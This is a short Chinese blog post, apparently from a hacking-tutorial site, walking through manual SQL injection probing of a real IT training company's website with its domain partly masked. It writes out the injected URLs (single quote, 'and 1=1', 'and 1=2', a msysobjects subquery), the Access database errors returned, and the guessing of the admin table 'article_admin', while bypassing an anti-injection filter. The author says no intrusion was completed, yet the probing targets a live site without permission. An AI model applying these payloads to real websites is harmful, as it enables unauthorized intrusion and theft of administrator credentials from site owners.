[组图]手工检测某天IT教育集团网站|
首先说本文只是为了介绍一下网站的检测方法,并未实质上完成入侵 偶然进入到了某天IT教育集团网站,看到武汉专业思科培训,CCNA、CCNP、CCSP、CCIE认证培训等等内容,叫我回忆起了自己学cisco时候的经历.于是打算看看他们的学员,于是打开了学员风采栏目.(首页 → 服务互动 → 学员采风) http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89 一不小心潜意识的加了个 '单引号' ,接触返回了如下错误提示: 首页 → 服务互动 Microsoft JET Database Engine 错误 '80040e14' 字符串的语法错误 在查询表达式 'unid = 89'' 中。 /common.asp,行 125 呵呵,有意思,继续探试 and 1=1 http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%201=1 返回正常页面,但是同时也弹出了"防注射系统".看来网站制作人在网站程序方面还是有安全意识地,不过这吓不倒谁,至少我的群名就叫[火力]依然那么猛,go on...... http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%201=2 http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89'%20and%20(select%20count(*)%20from%20msysobjects)>0-- 首页 → 服务互动 字符串的语法错误 在查询表达式 'unid = 89' and (select count(*) from msysobjects)>0--' 中。 /common.asp,行 125 这个语句是向数据库查询是否存在admin这个表,如果存在则返回正常页面,不存在会返回错误提示. 返回结果如下: Microsoft JET Database Engine 错误 '80040e37' Microsoft Jet 数据库引擎找不到输入表或查询 'admin'。 确定它是否存在,以及它的名称的拼写是否正确。 /common.asp,行 125 结果返回的还真是错误提示,看来这常见管理表admin确实受到了足够的重视.经过几翻尝试,最后终于确定了管理表为article_admin , 感谢我的表字典,阿门! 文章录入:cainiaowang 责任编辑:cainiaowang
VIP 专 区
|
您现在的位置: 